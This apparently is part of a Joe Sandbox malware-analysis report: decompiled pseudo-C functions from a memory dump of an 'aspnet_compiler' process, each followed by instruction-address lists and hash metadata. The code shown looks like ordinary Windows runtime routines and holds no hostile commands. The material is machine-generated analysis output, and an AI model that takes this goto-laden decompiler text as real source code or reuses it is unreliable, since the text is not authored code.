									_t102 = E012151BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x117166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
						__eflags = _t102 - 0xc0000100;
						if(_t102 == 0xc0000100) {
							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E011C2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E011A6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E011C2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E011AEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E011C2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E011C2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E011C2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E011ED0D1(_t62);
				goto L28;
			}





















                                                                                        0x011c2990
                                                                                        0x011c2992
                                                                                        0x011c2997
                                                                                        0x011c29a3
                                                                                        0x011c29a6
                                                                                        0x011c29ab
                                                                                        0x011c29ad
                                                                                        0x011c29b2
                                                                                        0x01205c80
                                                                                        0x011c29b8
                                                                                        0x011c29b8
                                                                                        0x011c29bb
                                                                                        0x011c29c0
                                                                                        0x011c29c5
                                                                                        0x011c29c6
                                                                                        0x011c29c6
                                                                                        0x011c29cb
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c29cd
                                                                                        0x011c29d0
                                                                                        0x011c29d9
                                                                                        0x011c29db
                                                                                        0x011c29dd
                                                                                        0x011c2a7f
                                                                                        0x011c2a84
                                                                                        0x011c2a87
                                                                                        0x011c2a89
                                                                                        0x01205ca1
                                                                                        0x01205ca3
                                                                                        0x00000000
                                                                                        0x011c2a8f
                                                                                        0x011c2a8f
                                                                                        0x00000000
                                                                                        0x011c2a8f
                                                                                        0x00000000
                                                                                        0x011c29e3
                                                                                        0x011c29e3
                                                                                        0x011c29e3
                                                                                        0x00000000
                                                                                        0x011c29e3
                                                                                        0x011c29dd
                                                                                        0x00000000
                                                                                        0x011c29db
                                                                                        0x011c29e6
                                                                                        0x011c29e9
                                                                                        0x011c29eb
                                                                                        0x011c29ed
                                                                                        0x011c29f3
                                                                                        0x011c29f5
                                                                                        0x011c29f8
                                                                                        0x011c29fa
                                                                                        0x011c2a97
                                                                                        0x011c2a9a
                                                                                        0x011c2a9d
                                                                                        0x011c2add
                                                                                        0x00000000
                                                                                        0x011c2a9f
                                                                                        0x011c2aa2
                                                                                        0x011c2aa5
                                                                                        0x011c2aa8
                                                                                        0x011c2aab
                                                                                        0x01205cab
                                                                                        0x01205caf
                                                                                        0x01205cc5
                                                                                        0x01205cda
                                                                                        0x01205cdc
                                                                                        0x01205cdf
                                                                                        0x01205ce5
                                                                                        0x00000000
                                                                                        0x01205ceb
                                                                                        0x01205ced
                                                                                        0x01205cee
                                                                                        0x00000000
                                                                                        0x01205cee
                                                                                        0x01205cb1
                                                                                        0x01205cb4
                                                                                        0x01205cb9
                                                                                        0x01205cbb
                                                                                        0x00000000
                                                                                        0x01205cbd
                                                                                        0x01205cbd
                                                                                        0x00000000
                                                                                        0x01205cbd
                                                                                        0x01205cbb
                                                                                        0x011c2ab1
                                                                                        0x011c2ab1
                                                                                        0x011c2ac4
                                                                                        0x011c2ac6
                                                                                        0x011c2ac6
                                                                                        0x00000000
                                                                                        0x011c2ac6
                                                                                        0x011c2aab
                                                                                        0x00000000
                                                                                        0x011c2a00
                                                                                        0x011c2a09
                                                                                        0x011c2a0e
                                                                                        0x011c2a21
                                                                                        0x011c2a24
                                                                                        0x011c2a35
                                                                                        0x011c2a3a
                                                                                        0x011c2a3d
                                                                                        0x011c2a42
                                                                                        0x011c2a59
                                                                                        0x011c2a59
                                                                                        0x011c2a5c
                                                                                        0x011c2a5f
                                                                                        0x011c2a5f
                                                                                        0x011c29fa
                                                                                        0x011c29f3
                                                                                        0x011c2a64
                                                                                        0x011c2a64
                                                                                        0x011c2a6b
                                                                                        0x011c2a6b
                                                                                        0x011c2a6d
                                                                                        0x011c2a72
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6a72c6a93e8686a244d6c58e9c9ad9eb58cf4accd4e95e4ab106e97c3fc8f8d7
                                                                                        • Instruction ID: fe669fb5a53ce5c75477ea1036eabd9813e690e6846a1a299cfb9c6a73031afc
                                                                                        • Opcode Fuzzy Hash: 6a72c6a93e8686a244d6c58e9c9ad9eb58cf4accd4e95e4ab106e97c3fc8f8d7
                                                                                        • Instruction Fuzzy Hash: E9519D3190021ADFDF2ACF98C840ADEBBB5BF68B14F158119E901AB660D375DD52CF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C4BAD Relevance: .1, Instructions: 131COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 85%
                                                                                        			E011C4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x128d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0119CC50(_t86);
					L11:
					return E011DB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x1288504
				E011B2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E011DFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E011DB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L011B4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0119CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x1288504
								E011AFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E011C4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                                        0x011c4bad
                                                                                        0x011c4bbf
                                                                                        0x011c4bc2
                                                                                        0x011c4bc6
                                                                                        0x011c4bcd
                                                                                        0x011c4bd9
                                                                                        0x012067fe
                                                                                        0x01206800
                                                                                        0x011c4ccc
                                                                                        0x011c4ccd
                                                                                        0x011c4cb7
                                                                                        0x011c4cc9
                                                                                        0x011c4cc9
                                                                                        0x011c4bdf
                                                                                        0x011c4be5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c4beb
                                                                                        0x011c4bef
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c4bf5
                                                                                        0x011c4bf9
                                                                                        0x011c4c06
                                                                                        0x011c4c0b
                                                                                        0x011c4c17
                                                                                        0x011c4c1c
                                                                                        0x011c4c1f
                                                                                        0x011c4c25
                                                                                        0x011c4c33
                                                                                        0x011c4c3d
                                                                                        0x011c4c40
                                                                                        0x011c4c43
                                                                                        0x011c4c47
                                                                                        0x011c4c4d
                                                                                        0x011c4c53
                                                                                        0x011c4c54
                                                                                        0x011c4c55
                                                                                        0x011c4c56
                                                                                        0x011c4c5b
                                                                                        0x011c4c5c
                                                                                        0x011c4c63
                                                                                        0x011c4c6b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01206776
                                                                                        0x01206784
                                                                                        0x01206784
                                                                                        0x0120679f
                                                                                        0x012067a7
                                                                                        0x012067af
                                                                                        0x012067ce
                                                                                        0x00000000
                                                                                        0x012067b1
                                                                                        0x012067b7
                                                                                        0x012067b8
                                                                                        0x012067c1
                                                                                        0x012067d3
                                                                                        0x012067d9
                                                                                        0x012067dd
                                                                                        0x011c4c94
                                                                                        0x011c4c94
                                                                                        0x011c4c98
                                                                                        0x011c4c9c
                                                                                        0x011c4ca3
                                                                                        0x012067f4
                                                                                        0x012067f4
                                                                                        0x011c4cb5
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c4cb5
                                                                                        0x011c4c79
                                                                                        0x011c4c7e
                                                                                        0x011c4c89
                                                                                        0x011c4c8b
                                                                                        0x011c4c8f
                                                                                        0x011c4c8f
                                                                                        0x00000000
                                                                                        0x011c4c89
                                                                                        0x012067c3
                                                                                        0x00000000
                                                                                        0x012067c3
                                                                                        0x012067af
                                                                                        0x011c4c73
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 69182b91dc9cbaff2819d7b17beac0f73028a505095fb957297ec629a6cc32c0
                                                                                        • Instruction ID: 81048551bf0067f0b562579c6b5431e64de62eb8ee916e2a0d3e5ef474176295
                                                                                        • Opcode Fuzzy Hash: 69182b91dc9cbaff2819d7b17beac0f73028a505095fb957297ec629a6cc32c0
                                                                                        • Instruction Fuzzy Hash: 7941E735A042299FDB29DF68C940FEE77B4EF55B00F0101A9E908AB691D734DE84CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011C4D3B Relevance: .1, Instructions: 131COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 78%
                                                                                        			E011C4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x128d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E011DFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1287bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E011DB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L011B4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0119CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E011DB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E011DF380(_t67 + 0xc, 0x1175138, 0x10) == 0) {
								 *0x12860d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E011C4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E011C4E70(0x12886b0, 0x11c5690, 0, 0) != 0) {
					_t46 = E0119CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                        0x011c4d3b
                                                                                        0x011c4d4d
                                                                                        0x011c4d53
                                                                                        0x011c4d58
                                                                                        0x011c4d65
                                                                                        0x011c4d6c
                                                                                        0x011c4d71
                                                                                        0x011c4d77
                                                                                        0x011c4d7f
                                                                                        0x011c4d8c
                                                                                        0x011c4d8e
                                                                                        0x011c4dad
                                                                                        0x011c4db0
                                                                                        0x011c4db7
                                                                                        0x011c4db8
                                                                                        0x011c4db9
                                                                                        0x011c4dba
                                                                                        0x011c4dbb
                                                                                        0x011c4dc1
                                                                                        0x011c4dc8
                                                                                        0x011c4dcc
                                                                                        0x011c4dd5
                                                                                        0x011c4dde
                                                                                        0x011c4ddf
                                                                                        0x011c4de0
                                                                                        0x011c4de1
                                                                                        0x011c4de6
                                                                                        0x011c4de7
                                                                                        0x011c4de9
                                                                                        0x011c4df3
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x01206c7c
                                                                                        0x01206c8a
                                                                                        0x01206c8a
                                                                                        0x01206c9d
                                                                                        0x01206ca7
                                                                                        0x01206cac
                                                                                        0x01206cb2
                                                                                        0x01206cb9
                                                                                        0x00000000
                                                                                        0x01206cbf
                                                                                        0x01206cbf
                                                                                        0x00000000
                                                                                        0x01206cbf
                                                                                        0x01206cb9
                                                                                        0x011c4dfb
                                                                                        0x01206ccf
                                                                                        0x01206cd3
                                                                                        0x011c4e32
                                                                                        0x011c4e39
                                                                                        0x01206ce0
                                                                                        0x01206cf2
                                                                                        0x01206cf2
                                                                                        0x01206ce0
                                                                                        0x011c4e3f
                                                                                        0x011c4e41
                                                                                        0x011c4e51
                                                                                        0x011c4e51
                                                                                        0x011c4e03
                                                                                        0x011c4e03
                                                                                        0x011c4e09
                                                                                        0x011c4e0f
                                                                                        0x011c4e57
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x011c4e1b
                                                                                        0x011c4e30
                                                                                        0x011c4e5b
                                                                                        0x011c4e5b
                                                                                        0x00000000
                                                                                        0x011c4e30
                                                                                        0x011c4e11
                                                                                        0x011c4e11
                                                                                        0x011c4e16
                                                                                        0x00000000
                                                                                        0x011c4e16
                                                                                        0x011c4e01
                                                                                        0x00000000
                                                                                        0x011c4e01
                                                                                        0x011c4da5
                                                                                        0x01206c6b
                                                                                        0x00000000
                                                                                        0x011c4dab
                                                                                        0x011c4dab
                                                                                        0x00000000
                                                                                        0x011c4dab

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: f6ad567bbe7e33678de93ad8464fc91ef6426816256047461adf68cc674b8a80
                                                                                        • Instruction ID: af8dbd6b5bd16865ff44b8b3a29a639adce4867fae93d818fcd21ac1788b5997
                                                                                        • Opcode Fuzzy Hash: f6ad567bbe7e33678de93ad8464fc91ef6426816256047461adf68cc674b8a80
                                                                                        • Instruction Fuzzy Hash: 5E413871A483289FEB3ADF14CC90FAAB7B5EB60B04F01009DE9459B681D774DD40CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 011A8A0A Relevance: .1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 94%
                                                                                        			E011A8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x128d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E011DB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E011AE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x1171180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E011C1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E011D3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E011A8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L011B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                                        0x011a8a0a
                                                                                        0x011a8a1c
                                                                                        0x011a8a23
                                                                                        0x011a8a2e
                                                                                        0x011a8a30
                                                                                        0x011a8a36
                                                                                        0x011a8a3c
                                                                                        0x011a8a3e
                                                                                        0x011a8a4a
                                                                                        0x011a8a52
                                                                                        0x011a8a9c
                                                                                        0x011a8aae
                                                                                        0x011a8a58
                                                                                        0x011a8a5e
                                                                                        0x011a8a6a
                                                                                        0x011a8a6f
                                                                                        0x011a8a75
                                                                                        0x011a8a7d
                                                                                        0x011a8a85
                                                                                        0x011a8a86
                                                                                        0x011a8a89
                                                                                        0x011a8a93
                                                                                        0x011a8a99
                                                                                        0x011a8a9b
                                                                                        0x00000000
                                                                                        0x011a8aaf
                                                                                        0x011a8abe
                                                                                        0x011a8ac3
                                                                                        0x011a8acb
                                                                                        0x011a8ad7
                                                                                        0x011a8ae0
                                                                                        0x011a8af1
                                                                                        0x00000000
                                                                                        0x011a8af1
                                                                                        0x011a8acd
                                                                                        0x011a8ad5
                                                                                        0x011a8afb
                                                                                        0x011a8afd
                                                                                        0x011a8aff
                                                                                        0x011a8b07
                                                                                        0x011a8b22
                                                                                        0x011a8b24
                                                                                        0x011a8b2a
                                                                                        0x011a8b2e
                                                                                        0x011a8b3f
                                                                                        0x011a8b78
                                                                                        0x011a8b41
                                                                                        0x011a8b52
                                                                                        0x011a8b54
                                                                                        0x011a8b5c
                                                                                        0x011a8b74
                                                                                        0x011a8b74
                                                                                        0x011a8b5c
                                                                                        0x011a8b3f
                                                                                        0x011a8b5e
                                                                                        0x011a8b61
                                                                                        0x011a8b64
                                                                                        0x011a8b64
                                                                                        0x011a8b6c
                                                                                        0x011a8b6c
                                                                                        0x011a8b11
                                                                                        0x011f9cd5
                                                                                        0x011f9cd5
                                                                                        0x011a8b17
                                                                                        0x011a8b1a
                                                                                        0x011a8b1a
                                                                                        0x00000000
                                                                                        0x011a8ad5
                                                                                        0x011a8a89

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.400368795.0000000001170000.00000040.00000800.00020000.00000000.sdmp, Offset: 01170000, based on PE: true
                                                                                        • Associated: 00000001.00000002.401755093.000000000128B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000001.00000002.401765692.000000000128F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_1170000_aspnet_compiler.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 16f7ce20ab5fade443f2bc690e5846575a8b6f1e6464bdf0c865d62f05192c24
                                                                                        • Instruction ID: f4747aafd14d482fff54d203bcb7deb3c8145d0e6c0fa086dafb3db69266d42b
                                                                                        • Opcode Fuzzy Hash: 16f7ce20ab5fade443f2bc690e5846575a8b6f1e6464bdf0c865d62f05192c24
                                                                                        • Instruction Fuzzy Hash: 064192B8A0032D9BDB2CDF19C898AA9BBF4FB54301F5041E9D919D7242E7709E80CF60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0125AA16 Relevance: .1, Instructions: 120COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0125AA16(void* __ecx, intOrPtr __edx, signed int _a4, short _a8) {
				intOrPtr _v8;
				char _v12;
				signed int _v16;
				signed char _v20;
				intOrPtr _v24;
				char* _t37;
				void* _t47;
				signed char _t51;
				void* _t53;
				char _t55;
				intOrPtr _t57;
				signed char _t61;
				intOrPtr _t75;
				void* _t76;
				signed int _t81;
				intOrPtr _t82;

				_t53 = __ecx;
				_t55 = 0;
				_v20 = _v20 & 0;
				_t75 = __edx;
				_t81 = ( *(__ecx + 0xc) | _a4) & 0x93000f0b;
				_v24 = __edx;
				_v12 = 0;
				if((_t81 & 0x01000000) != 0) {
					L5:
					if(_a8 != 0) {
						_t81 = _t81 | 0x00000008;
					}
					_t57 = E0125ABF4(_t55 + _t75, _t81);
					_v8 = _t57;
					if(_t57 < _t75 || _t75 > 0x7fffffff) {
						_t76 = 0;
						_v16 = _v16 & 0;
					} else {
						_t59 = _t53;
						_t76 = E0125AB54(_t53, _t75, _t57, _t81 & 0x13000003,  &_v16);
						if(_t76 != 0 && (_t81 & 0x30000f08) != 0) {
							_t47 = E0125AC78(_t53, _t76, _v24, _t59, _v12, _t81, _a8);
							_t61 = _v20;
							if(_t61 != 0) {
								 *(_t47 + 2) =  *(_t47 + 2) ^ ( *(_t47 + 2) ^ _t61) & 0x0000000f;
								if(E0123CB1E(_t61, _t53, _t76, 2, _t47 + 8) < 0) {
									L011B77F0(_t53, 0, _t76);
									_t76 = 0;
								}
							}
						}
					}
					_t82 = _v8;
					L16:
					if(E011B7D50() == 0) {
						_t37 = 0x7ffe0380;
					} else {
						_t37 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t37 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						E0125131B(_t53, _t76, _t82, _v16);
					}
					return _t76;
				}
				_t51 =  *(__ecx + 0x20);
				_v20 = _t51;
				if(_t51 == 0) {
					goto L5;
				}
				_t81 = _t81 | 0x00000008;
				if(E0123CB1E(_t51, __ecx, 0, 1,  &_v12) >= 0) {
					_t55 = _v12;
					goto L5;
				} else {
					_t82 = 0;
					_t76 = 0;
					_v16 = _v16 & 0;
					goto L16;
				}
			}



















                                                                                        0x0125aa1f
                                                                                        0x0125aa21
                                                                                        0x0125aa23
                                                                                        0x0125aa2b
                                                                                        0x0125aa30
                                                                                        0x0125aa36
                                                                                        0x0125aa39
                                                                                        0x0125aa42
                                                                                        0x0125aa75
                                                                                        0x0125aa7a
                                                                                        0x0125aa7c
                                                                                        0x0125aa7c
                                                                                        0x0125aa88
                                                                                        0x0125aa8a
                                                                                        0x0125aa8f
                                                                                        0x0125ab02
                                                                                        0x0125ab04
